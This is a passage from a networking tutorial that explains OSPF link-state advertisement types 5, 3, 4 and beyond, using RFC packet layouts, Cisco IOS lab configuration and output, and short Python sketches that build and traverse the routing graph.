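Both observations are easy to reproduce with a short Python sketch. The dictionary layout and helper names are illustrative; the transit costs for R3 and R4 are assumed to be the default of 1, since only R2's LSA1 is shown in full.

```python
from ipaddress import ip_network

# LSA2 contents as seen in the output above.
lsa2 = {
    "lsid": "192.168.234.4",
    "mask_len": 24,
    "attached": ["4.4.4.4", "2.2.2.2", "3.3.3.3"],
}

def transit_prefix(lsa2):
    """Derive the subnet by applying the mask to the LSID (the DR address)."""
    return ip_network(f"{lsa2['lsid']}/{lsa2['mask_len']}", strict=False)

def pseudo_node_edges(lsa2, transit_costs):
    """Edges to the pseudo-node use the LSA1 cost, edges from it cost zero."""
    node = f"net:{lsa2['lsid']}"
    edges = {}
    for rid in lsa2["attached"]:
        if rid in transit_costs:  # router also advertises a transit link
            edges[(rid, node)] = transit_costs[rid]
            edges[(node, rid)] = 0
    return edges

# Cost of the transit link in each router's LSA1 (R3 and R4 are assumed).
costs = {"2.2.2.2": 1, "3.3.3.3": 1, "4.4.4.4": 1}
print(transit_prefix(lsa2))
print(pseudo_node_edges(lsa2, costs))
```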

As a side note, OSPF prefix suppression should become quite obvious now:

  1. it eliminates stub link types on point-to-point adjacencies;
  2. it assigns /32 mask to LSA2 as a special indicator to ignore the subnet; the worst-case scenario – DR IP address would be reachable but not the whole subnet.

Using LSA1 and LSA2 data structures, it’s possible to create a graph that describes the whole OSPF area. However, there is also a notion of external prefixes and several areas in OSPF – that’s where we’re headed next.
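To see the graph in action, here is a minimal Dijkstra sketch in Python over the area 0 topology built so far, rooted at R4. Node labels are illustrative, and the transit link costs of R3 and R4 are assumed to be the default of 1.

```python
import heapq

NET = "net:192.168.234.4"  # pseudo-node of the broadcast segment

# Directed, weighted graph assembled from LSA1 and LSA2 contents.
graph = {
    "R1": {"R2": 1, "1.1.1.1/32": 1, "192.168.12.0/24": 1},
    "R2": {"R1": 1, NET: 1, "192.168.12.0/24": 1},
    "R3": {NET: 1},
    "R4": {NET: 1},
    NET: {"R2": 0, "R3": 0, "R4": 0},  # zero cost when leaving the pseudo-node
}

def spf(graph, root):
    """Plain Dijkstra: return the lowest cost from root to every reachable node."""
    dist = {root: 0}
    heap = [(0, root)]
    while heap:
        d, node = heapq.heappop(heap)
        if d > dist.get(node, float("inf")):
            continue  # stale heap entry
        for nbr, cost in graph.get(node, {}).items():
            nd = d + cost
            if nd < dist.get(nbr, float("inf")):
                dist[nbr] = nd
                heapq.heappush(heap, (nd, nbr))
    return dist

dist = spf(graph, "R4")
print(dist["1.1.1.1/32"], dist["192.168.12.0/24"])
```

The resulting costs of 3 and 2 agree with the metrics R4 reports for 1.1.1.1 and 192.168.12.0/24 in its routing table further down in the article.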

LSA5: AS-external LSA

This LSA is pretty straightforward: it announces an external subnet, mask and a few knobs to make life easier (no). The format is shown below:

        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |            LS age             |     Options   |      5        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Link State ID                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     Advertising Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     LS sequence number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |         LS checksum           |             length            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Network Mask                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |E|     0       |                  metric                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                      Forwarding address                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                      External Route Tag                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |E|    TOS      |                TOS  metric                    |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                      Forwarding address                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                      External Route Tag                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |

LSID is equal to network number, mask and metric are listed explicitly… Everything is there to build a vertex and corresponding edges, pretty much like stub networks in LSA1. If you want to know more about Forwarding address (FA), check out this blog and links for a series dedicated to LSA5 FA and its effects, which sometimes might prove somewhat useful. For the rest of the data, RFC 2328 section A.4.5 is more than enough.

In our topology R3 is the one to generate LSA5 with loopback redistribution:

R3(config)#router ospf 1
R3(config-router)#redistribute connected subnets
R3#
R3#show ip ospf database

            OSPF Router with ID (3.3.3.3) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         441         0x80000025 0x00A449 3
2.2.2.2         2.2.2.2         962         0x80000011 0x00460D 3
3.3.3.3         3.3.3.3         23          0x80000009 0x003A27 1
4.4.4.4         4.4.4.4         1085        0x8000000A 0x00F365 1

                Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.234.4   4.4.4.4         835         0x80000004 0x00EABB

                Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
3.3.3.3         3.3.3.3         2           0x80000001 0x000385 0
R3#
R3#show ip ospf database external

            OSPF Router with ID (3.3.3.3) (Process ID 1)

                Type-5 AS External Link States

  LS age: 38
  Options: (No TOS-capability, DC, Upward)
  LS Type: AS External Link
  Link State ID: 3.3.3.3 (External Network Number )
  Advertising Router: 3.3.3.3
  LS Seq Number: 80000001
  Checksum: 0x385
  Length: 36
  Network Mask: /32
        Metric Type: 2 (Larger than any link state path)
        MTID: 0
        Metric: 20
        Forward Address: 0.0.0.0
        External Route Tag: 0

Keep in mind that LSA5 is flooded within the whole AS, not just OSPF area. In order to build the graph further, we need a vertex (LSA5 LSID) and an edge (Advertising Router) along with its weight:

Figure 6. LSA5 added
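The edge weight deserves a short illustration because it depends on the metric type. The Python sketch below follows the standard OSPF behaviour: a type 1 external metric is added to the internal cost to the ASBR, while a type 2 metric is used as is, with the internal cost serving only as a tie-breaker. The function name and the internal costs (1 from R2 to R3, 2 from R1 to R3) are assumptions based on default interface costs in this lab.

```python
def external_cost(metric_type: int, ext_metric: int, cost_to_asbr: int) -> int:
    """Route metric for an external prefix as seen by a given router."""
    if metric_type == 1:
        return ext_metric + cost_to_asbr  # E1: comparable to link-state cost
    if metric_type == 2:
        return ext_metric                 # E2: internal cost only breaks ties
    raise ValueError("metric type must be 1 or 2")

# 3.3.3.3/32 is advertised by R3 with metric 20, type 2.
print(external_cost(2, 20, cost_to_asbr=1))  # as seen from R2
print(external_cost(2, 20, cost_to_asbr=2))  # as seen from R1
print(external_cost(1, 20, cost_to_asbr=2))  # if it were type 1 instead
```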

That’s it for LSA5 role in the graph. Almost.

LSA3: summary LSA

Let’s switch to inter-area communication for a moment. Beware of the first thought: this LSA is not intended for prefix summarization in the usual sense. It is used to summarize topology information from another area: LSA1 and LSA2, used for building a graph, are not transferred between areas but morphed into LSA3 based on LSDB or RIB contents (more on that later). LSA3 format is shown below:

        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |            LS age             |     Options   |       3       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Link State ID                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     Advertising Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     LS sequence number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |         LS checksum           |             length            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Network Mask                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |      0        |                  metric                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |     TOS       |                TOS  metric                    |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |

The idea is pretty much the same as with LSA5: transfer network (LSA3 LSID), mask and corresponding metric to another area. In order to conserve computing resources of the routers and thus make OSPF AS more scalable, there is no topology information exchanged between areas and multi-area OSPF acts as a distance-vector (DV) routing protocol. This is the reason why some authors call this IGP a hybrid one (EIGRP is a pure DV IGP although quite advanced). DV logic usually requires some loop prevention mechanism like split-horizon, DUAL and so on. OSPF, however, employs a completely different logic: LSA3 can cross an area border only when one of the areas is area 0 aka backbone area. This concept allows creation of a small tree: area 0 is the root while all other areas are on the same level below area 0. It is obvious that no routing loops can occur between areas in such a setup as there is always only a single path available – through backbone.

Let’s configure area 1, including R4 and R5:

R4(config)#interface f0/1
R4(config-if)#ip ospf 1 area 1
R4(config-if)#ip ospf network point-to-point
R5(config)#router ospf 1
R5(config-router)#router-id 5.5.5.5
R5(config)#interface f0/1
R5(config-if)#ip ospf 1 area 1
R5(config-if)#ip ospf network point-to-point
R5(config)#interface lo 1
R5(config-if)#ip address 5.5.5.5 255.255.255.255
R5(config-if)#ip ospf 1 area 1
R5(config)#interface lo 2
R5(config-if)#ip address 5.5.5.55 255.255.255.255
R5(config-if)#ip ospf 1 area 1
R2#show ip ospf database

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         782         0x80000027 0x00A04B 3
2.2.2.2         2.2.2.2         1339        0x80000013 0x00420F 3
3.3.3.3         3.3.3.3         422         0x8000000B 0x003629 1
4.4.4.4         4.4.4.4         252         0x8000000D 0x00F064 1

                Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.234.4   4.4.4.4         1235        0x80000006 0x00E6BD

                Summary Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
5.5.5.5         4.4.4.4         170         0x80000001 0x003ED8
5.5.5.55        4.4.4.4         156         0x80000001 0x00489C
192.168.45.0    4.4.4.4         242         0x80000001 0x00781D

                Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
3.3.3.3         3.3.3.3         422         0x80000003 0x00FE87 0

As expected, prefixes from area 1 are seen through LSA3. R4, being an ABR, is listed as an advertising router. From backbone point of view, all these prefixes are directly connected to R4 thus maintaining area 1 topology concealment.

R2#show ip ospf database summary adv-router 4.4.4.4

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Summary Net Link States (Area 0)

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 823
  Options: (No TOS-capability, DC, Upward)
  LS Type: Summary Links(Network)
  Link State ID: 5.5.5.5 (summary Network Number)
  Advertising Router: 4.4.4.4
  LS Seq Number: 80000001
  Checksum: 0x3ED8
  Length: 28
  Network Mask: /32
        MTID: 0         Metric: 2

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 809
  Options: (No TOS-capability, DC, Upward)
  LS Type: Summary Links(Network)
  Link State ID: 5.5.5.55 (summary Network Number)
  Advertising Router: 4.4.4.4
  LS Seq Number: 80000001
  Checksum: 0x489C
  Length: 28
  Network Mask: /32
        MTID: 0         Metric: 2

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 895
  Options: (No TOS-capability, DC, Upward)
  LS Type: Summary Links(Network)
  Link State ID: 192.168.45.0 (summary Network Number)
  Advertising Router: 4.4.4.4
  LS Seq Number: 80000001
  Checksum: 0x781D
  Length: 28
  Network Mask: /24
        MTID: 0         Metric: 1

We have enough experience now to reconstruct area 1 graph from its LSDB so the focus for the rest of the article would be area 0 point of view on OSPF AS.

Figure 7. LSA3 added
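The distance-vector flavour of LSA3 boils down to a single addition: the cost to the ABR (taken from the local SPF tree) plus the metric the ABR advertises. A minimal Python sketch, assuming the cost from R2 to R4 is 1 and from R1 to R4 is 2 (default interface costs); the function name is illustrative.

```python
# LSA3 metrics advertised by R4 (4.4.4.4), taken from the output above.
summaries = {
    "5.5.5.5/32": 2,
    "5.5.5.55/32": 2,
    "192.168.45.0/24": 1,
}

def inter_area_costs(cost_to_abr: int, summaries: dict) -> dict:
    """Cost of each inter-area prefix = cost to ABR + metric inside LSA3."""
    return {prefix: cost_to_abr + metric for prefix, metric in summaries.items()}

print(inter_area_costs(1, summaries))  # R2's point of view
print(inter_area_costs(2, summaries))  # R1's point of view
```

Nothing about R5 or the R4-R5 link is needed for this calculation, which is the whole point of hiding area 1 topology behind the ABR.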

The only thing left to verify is the trigger for LSA3 generation. Let’s filter 5.5.5.55/32 from R4 RIB and see if it is propagated into area 0 while not being present in routing table.

R4(config)#ip prefix-list FILTER deny 5.5.5.55/32
R4(config)#ip prefix-list FILTER permit 0.0.0.0/0 le 32
R4(config)#router ospf 1
R4(config-router)#distribute-list prefix FILTER in
R4#
R4#show ip route ospf
<output omitted>

      1.0.0.0/32 is subnetted, 1 subnets
O        1.1.1.1 [110/3] via 192.168.234.2, 00:00:05, FastEthernet0/0
      3.0.0.0/32 is subnetted, 1 subnets
O E2     3.3.3.3 [110/20] via 192.168.234.3, 00:00:05, FastEthernet0/0
      5.0.0.0/32 is subnetted, 1 subnets
O        5.5.5.5 [110/2] via 192.168.45.5, 00:00:05, FastEthernet0/1
O     192.168.12.0/24 [110/2] via 192.168.234.2, 00:00:05, FastEthernet0/0
R2#show ip ospf database

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         228         0x80000028 0x009E4C 3
2.2.2.2         2.2.2.2         804         0x80000014 0x004010 3
3.3.3.3         3.3.3.3         1868        0x8000000B 0x003629 1
4.4.4.4         4.4.4.4         1697        0x8000000D 0x00F064 1

                Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.234.4   4.4.4.4         653         0x80000007 0x00E4BE

                Summary Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
5.5.5.5         4.4.4.4         1615        0x80000001 0x003ED8
5.5.5.55        4.4.4.4         1602        0x80000001 0x00489C
192.168.45.0    4.4.4.4         1688        0x80000001 0x00781D

                Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
3.3.3.3         3.3.3.3         1868        0x80000003 0x00FE87 0
R2#
R2#show ip route ospf
<output omitted>

      1.0.0.0/32 is subnetted, 1 subnets
O        1.1.1.1 [110/2] via 192.168.12.1, 06:10:34, FastEthernet0/1
      3.0.0.0/32 is subnetted, 1 subnets
O E2     3.3.3.3 [110/20] via 192.168.234.3, 01:37:25, FastEthernet0/0
      5.0.0.0/32 is subnetted, 2 subnets
O IA     5.5.5.5 [110/3] via 192.168.234.4, 00:26:58, FastEthernet0/0
O IA     5.5.5.55 [110/3] via 192.168.234.4, 00:26:44, FastEthernet0/0
O IA  192.168.45.0/24 [110/2] via 192.168.234.4, 00:28:10, FastEthernet0/0

According to RFC 2328 section 12.4.3, LSA3 routes are “determined by examining the routing table structure”. However, filtering 5.5.5.55/32 from the RIB does not prevent R4 (IOS) from generating a corresponding LSA3 into the backbone area. Unlike DV IGPs, OSPF is not designed for RIB filtering at an arbitrary point of the network, which is why using such a knob is generally not a good idea.

LSA4: ASBR-summary LSA

As you might have already guessed, LSA4 summarizes topology information about ASBRs. Remember that LSA5 propagates throughout the whole AS? An LSA can be changed only by its owner to ensure LSDB consistency across an area. There is also no vertex to anchor to if the ASBR is located in a different area since the Advertising Router ID would be unknown. The mission of LSA4 is to fix such a misfortune. It has the same layout as LSA3:

        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |            LS age             |     Options   |       4       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Link State ID                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     Advertising Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     LS sequence number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |         LS checksum           |             length            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Network Mask                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |      0        |                  metric                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |     TOS       |                TOS  metric                    |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |

The difference is in LSID meaning: while LSA3 lists the network number in this field, LSA4 places ASBR RID there. Let’s generate some LSA5 in area 1 and see what effect it has on backbone area.

R5(config)#router ospf 1
R5(config-router)#redistribute connected subnets
R2#show ip ospf database

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         1561        0x80000028 0x009E4C 3
2.2.2.2         2.2.2.2         112         0x80000015 0x003E11 3
3.3.3.3         3.3.3.3         1180        0x8000000C 0x00342A 1
4.4.4.4         4.4.4.4         1221        0x8000000E 0x00EE65 1

                Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.234.4   4.4.4.4         1986        0x80000007 0x00E4BE

                Summary Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
5.5.5.5         4.4.4.4         960         0x80000002 0x003CD9
5.5.5.55        4.4.4.4         960         0x80000002 0x00469D
192.168.45.0    4.4.4.4         960         0x80000002 0x00761E

                Summary ASB Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
5.5.5.5         4.4.4.4         10          0x80000001 0x0026F0

                Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
3.3.3.3         3.3.3.3         1180        0x80000004 0x00FC88 0
6.6.6.6         5.5.5.5         16          0x80000001 0x00E997 0

LSA4s are generated only by ABRs, when an ABR transfers LSA5 from one area to another. In our case, 6.6.6.6/32 triggers R4 to create LSA4 for R5.

R2#show ip ospf database asbr-summary

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Summary ASB Link States (Area 0)

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 144
  Options: (No TOS-capability, DC, Upward)
  LS Type: Summary Links(AS Boundary Router)
  Link State ID: 5.5.5.5 (AS Boundary Router address)
  Advertising Router: 4.4.4.4
  LS Seq Number: 80000001
  Checksum: 0x26F0
  Length: 28
  Network Mask: /0
        MTID: 0         Metric: 1

Besides ASBR ID, LSA4 also carries the metric to reach ASBR from ABR perspective. Now the node, that can be considered an owner of LSA5 prefix within the area, can be easily established, thus closing the last gap in extending the graph across AS.

Figure 8. LSA4 added
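The way LSA4 closes the gap can be sketched as a lookup: if the ASBR sits in the local area, its cost comes straight from the SPF tree; otherwise it is the cost to an ABR plus the metric from that ABR's LSA4. The Python below is an illustration under that assumption; the data layout and function name are hypothetical, and intra-area costs from R2 are assumed to be 1 (default interface costs).

```python
def cost_to_asbr(asbr, intra_area, asbr_summaries):
    """Return the cost to reach an ASBR, or None if it cannot be resolved."""
    if asbr in intra_area:
        return intra_area[asbr]  # ASBR is a vertex in the local area
    options = [intra_area[abr] + metric
               for (lsid, abr), metric in asbr_summaries.items()
               if lsid == asbr and abr in intra_area]
    return min(options) if options else None

# R2's SPF results for routers in area 0 (assumed default costs).
intra_area = {"1.1.1.1": 1, "3.3.3.3": 1, "4.4.4.4": 1}
# LSA4 entries keyed by (LSID = ASBR RID, Advertising Router = ABR RID).
asbr_summaries = {("5.5.5.5", "4.4.4.4"): 1}

print(cost_to_asbr("3.3.3.3", intra_area, asbr_summaries))  # local ASBR
print(cost_to_asbr("5.5.5.5", intra_area, asbr_summaries))  # ASBR behind R4
print(cost_to_asbr("9.9.9.9", intra_area, asbr_summaries))  # unknown ASBR
```

When the lookup returns None, there is no vertex to attach the LSA5 prefix to, so the external route cannot be used.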

LSA 6, 7 and beyond

There are also a few LSA types that we have not covered yet; in this section I would like to look through them briefly. Some of these LSAs represent gradual modifications to the original algorithm. The changes are not drastic, but each is a topic of its own, so a detailed description of these LSAs is out of scope of this article.

LSA6 was allocated for multicast OSPF extension which has been obsolete for a very long time.

LSA7 is a knob to allow external prefixes to be injected into stub areas, turning them into so-called not-so-stubby areas or NSSA. If FA in LSA5 gave you the creeps, LSA7 would make your hair stand on end.

LSA8 was aimed to expand LSA5 via additional attributes but it didn’t make it out of the draft.

LSA9 (link-local), 10 (area-local) and 11 (AS-local) are called opaque LSAs. They are designed to carry arbitrary information; these LSAs are extensively used for calculating MPLS TE tunnels via constrained SPF (CSPF).

Kudos for review: Anastasiia Kuraleva
